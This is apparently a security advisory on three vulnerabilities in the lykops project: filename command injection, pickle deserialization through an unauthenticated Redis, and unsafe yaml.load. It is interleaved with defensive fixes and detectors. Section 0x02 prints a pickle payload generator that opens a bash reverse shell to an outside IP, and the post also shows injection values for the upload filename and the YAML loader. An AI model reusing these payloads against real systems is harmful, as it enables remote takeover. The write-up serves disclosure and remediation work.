
lykops has multiple vulnerabilities

0x00    intro

- github repo:https://github.com/lykops/lykops
- 121 stars and 65 forks til 2021/2/6


0x01    Post-Auth OS-command injection

lykops/library/utils/file.py#248 ->upload_file()





Following the call chain we reach lykops/lykops/ansible/yaml.py#74 (github link here).

The vulnerable parameter `file` comes from our HTTP request, as an entry of the FILES[] array.


So we completely control this unsanitized parameter, which gives an OS command injection.


  1. The corresponding route is ^ansible/yaml/import$; we can trigger the vuln by visiting it.
  2. Also, you can see that an exception triggers two invocations of import_file(), which means a `sleep 5` command causes a delay of 10 seconds.


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...
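The pattern behind this bug, as an added illustration that is not lykops code: a naive upload handler interpolates the client-supplied filename into a shell string, so a name like `test.txt$(sleep 5)` becomes shell syntax. Next to it is the hardened form, which validates the name against a strict allow-list and hands an argv list to subprocess (no shell), with shlex.quote as a fallback when a shell string is unavoidable. The function names, the `cp` command and the /tmp paths are assumptions for the example.

```python
# Added example (not lykops code): the upload-filename command-injection
# pattern, shown as a vulnerable command builder beside a hardened one.
# Function names, the `cp` command and the paths are assumptions.
import re
import shlex

# plain basename: starts alphanumeric, then only [A-Za-z0-9._-], max 255 chars
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def vulnerable_copy_command(filename, dest_dir="/tmp/uploads"):
    """Builds the shell string the way a naive handler would: the request's
    filename is interpolated straight into the command. Returned, not run,
    so the flaw can be inspected."""
    return "cp /tmp/%s %s/%s" % (filename, dest_dir, filename)


def validate_filename(filename):
    """Accept only a plain basename from the allow-list; shell metacharacters,
    path separators and '..' are rejected outright."""
    if not SAFE_NAME.match(filename) or ".." in filename:
        raise ValueError("unsafe upload filename: %r" % filename)
    return filename


def is_rejected(filename):
    """True if validate_filename() refuses the name."""
    try:
        validate_filename(filename)
    except ValueError:
        return True
    return False


def hardened_copy_argv(filename, dest_dir="/tmp/uploads"):
    """Validates the name and returns an argv list for subprocess.run(argv)
    with no shell=True, so the filename can never be parsed as shell syntax."""
    name = validate_filename(filename)
    return ["cp", "/tmp/" + name, dest_dir + "/" + name]


def hardened_copy_shell(filename, dest_dir="/tmp/uploads"):
    """Fallback when a shell string is unavoidable: shlex.quote() turns each
    path into a single literal word. Validation still runs first."""
    name = validate_filename(filename)
    return "cp %s %s" % (shlex.quote("/tmp/" + name),
                         shlex.quote(dest_dir + "/" + name))


if __name__ == "__main__":
    injected = "test.txt$(sleep 5)"   # the filename from the request above
    print(vulnerable_copy_command(injected))   # $(sleep 5) reaches the shell
    print(hardened_copy_argv("test.txt"))
    try:
        hardened_copy_argv(injected)
    except ValueError as e:
        print("rejected:", e)
```

The argv form is the real fix; the allow-list is defence in depth, and a 10-second response to a filename containing `$(sleep 5)` is the timing signal the write-up uses to confirm the bug, so a slow-request alert on the import route is a cheap detection.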



0x02    Pre-Auth pickle Deserialization RCE via Unauthenticated Redis

The login route is ^login.html; the corresponding implementation is the Login->login function.


Following get_userinfo, we find that the user's login cache is retrieved from Redis.


At line 81 the variable adminuser is passed in as user=adminuser; searching the codebase for the variable name shows that the default value of adminuser is lykops.





Further, Redis stores strings, so to turn them back into Python objects there must be a deserialization step.
If that deserialization is not properly restricted, there is a vulnerability. Which function does it use to deserialize?


pickle.loads! This evil function!

This is the implementation of get: when the input parameter is fmt=obj, the string fetched from Redis is deserialized, and the deserialization function actually used is pickle.loads!

If you are not familiar with Python deserialization attacks, see the post "python deserialization attacks from scratch".

The following figure shows a demo that uses deserialization to run commands in Python cmdline. 

So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

# pickle.loads() calls whatever callable __reduce__ returns, with the
# given arguments, while rebuilding the object.
class py():
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py())
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.2/1337 0>&1q\x01\x85q\x02Rq\x03.'

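The defensive side of the same mechanism, as an added example that is not lykops code: a restricted unpickler (the pattern from the Python standard-library docs) that refuses every global reference except a short list of builtin types, so a `__reduce__` hook pointing at `os.system` aborts the load before anything is called, and a JSON-based cache that removes pickle from the Redis path altogether. The cache helper names, the in-memory stand-in for the Redis client and the sample user record are assumptions; the demonstration payload uses a harmless callable.

```python
# Added example (not lykops code): two ways to stop a Redis value from
# becoming code. Helper names, the FakeRedis stand-in and the sample
# records are constructed for the example.
import builtins
import io
import json
import os
import pickle

# --- restricted unpickler (pattern from the Python docs) --------------------
# Only these builtin types may be referenced; any other module.name global,
# os.system / posix.system included, raises before it is ever called.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str",
                 "int", "float", "bool", "bytes"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global %s.%s is forbidden" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_is_blocked(data):
    """True if restricted_loads() refuses the payload."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def benign_pickle():
    """A plain dict, the kind of value a session cache legitimately holds."""
    return pickle.dumps({"user": "lykops", "id": 1})


class Hook:
    """Object with a __reduce__ hook. os.getpid is harmless; with the real
    bug the callable is attacker-chosen, which is the whole problem."""
    def __reduce__(self):
        return (os.getpid, ())


def hook_pickle():
    return pickle.dumps(Hook())


# --- JSON cache instead of pickle -------------------------------------------
# Login data is a few strings and ints, which JSON carries fine. Whoever can
# write the Redis key then controls data, not code.
class FakeRedis:
    """Minimal stand-in for the redis client's get/set (constructed)."""
    def __init__(self):
        self._store = {}

    def set(self, key, value):
        self._store[key] = value

    def get(self, key):
        return self._store.get(key)


def cache_userinfo(r, user, info):
    r.set("userinfo:" + user, json.dumps(info).encode())


def load_userinfo(r, user):
    raw = r.get("userinfo:" + user)
    if raw is None:
        return None
    info = json.loads(raw.decode())
    if not isinstance(info, dict):        # keep the shape callers expect
        raise ValueError("corrupt cache entry for %r" % user)
    return info
```

The restricted unpickler is the smaller change if the pickle format has to stay; switching the cache to JSON is the better one, and either way the Redis instance should require authentication and not be reachable from the network, since the pre-auth part of this bug is entirely the open Redis.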

0x03    Post-Auth YAML Deserialization RCE

Firstly, people should know that improper use of yaml.load
allows arbitrary Python objects to be loaded, which in most cases means RCE.

For the original tutorial, see https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load, we get this: library/utils/yaml.py#27 (github link here).

The invocation comes from yaml_loader(), which is triggered in the upload function.

!!python/object/new:os.system ["sleep 2"]

So we get a Post-Auth RCE.

The source is in library/utils/file.py (github link here).
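How the fix looks and how to spot the payload in uploads, as an added example that is not lykops code: the loader for user-supplied YAML uses yaml.safe_load, whose constructor set contains no python/* tags, so the `!!python/object/new:os.system` document above cannot construct anything. In front of it sits a cheap regex check that recognises both the short tag form used above and the verbose `!<tag:yaml.org,2002:python/...>` spelling, which is useful for logging and alerting on uploads but is not a substitute for the safe loader. The function names are assumptions and the sample documents are constructed; the block stays importable when PyYAML is absent.

```python
# Added example (not lykops code): yaml.safe_load for untrusted input plus a
# pre-parse tag detector. Function names are assumptions; sample documents
# are constructed.
import re

try:
    import yaml                      # PyYAML, the library discussed above
    HAVE_YAML = True
except ImportError:                  # keep the module importable without it
    HAVE_YAML = False

# Both the short '!!python/' form and the verbose global-tag form that a
# check for the literal '!!python' alone would miss.
PYTHON_TAG = re.compile(r"!!python/|tag:yaml\.org,2002:python/")

INJECTED = '!!python/object/new:os.system ["sleep 2"]'        # from the post
INJECTED_VERBOSE = '!<tag:yaml.org,2002:python/object/new:os.system> ["sleep 2"]'
BENIGN = "- hosts: all\n  tasks:\n    - name: ping\n      ping:\n"   # constructed


def contains_python_tag(text):
    """Detector for python/* tags: good for alerting on uploads and for
    refusing early, not a replacement for the safe loader, since only the
    parser sees the document the way the parser does."""
    return PYTHON_TAG.search(text) is not None


def load_untrusted_yaml(text):
    """Parse user-supplied YAML. Tagged documents are refused up front; the
    loader itself is safe_load, so yaml.load's arbitrary-object
    construction is never reachable from this path."""
    if contains_python_tag(text):
        raise ValueError("refusing YAML document with python/* tag")
    if not HAVE_YAML:
        raise RuntimeError("PyYAML is not installed")
    return yaml.safe_load(text)


def loader_rejects(text):
    """True if load_untrusted_yaml() refuses the document."""
    try:
        load_untrusted_yaml(text)
    except (ValueError, RuntimeError):
        return True
    except Exception:      # yaml.YAMLError: safe_load itself has no python/* constructors
        return True
    return False


if __name__ == "__main__":
    print("tag in payload:", contains_python_tag(INJECTED))
    print("tag in verbose payload:", contains_python_tag(INJECTED_VERBOSE))
    print("payload rejected:", loader_rejects(INJECTED))
    if HAVE_YAML:
        print(load_untrusted_yaml(BENIGN))
```

In code review, the grep is simply `yaml.load(` without `Loader=SafeLoader` (or `yaml.load` with the legacy default loader on PyYAML older than 5.1); every hit on a path that handles an upload is this bug.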
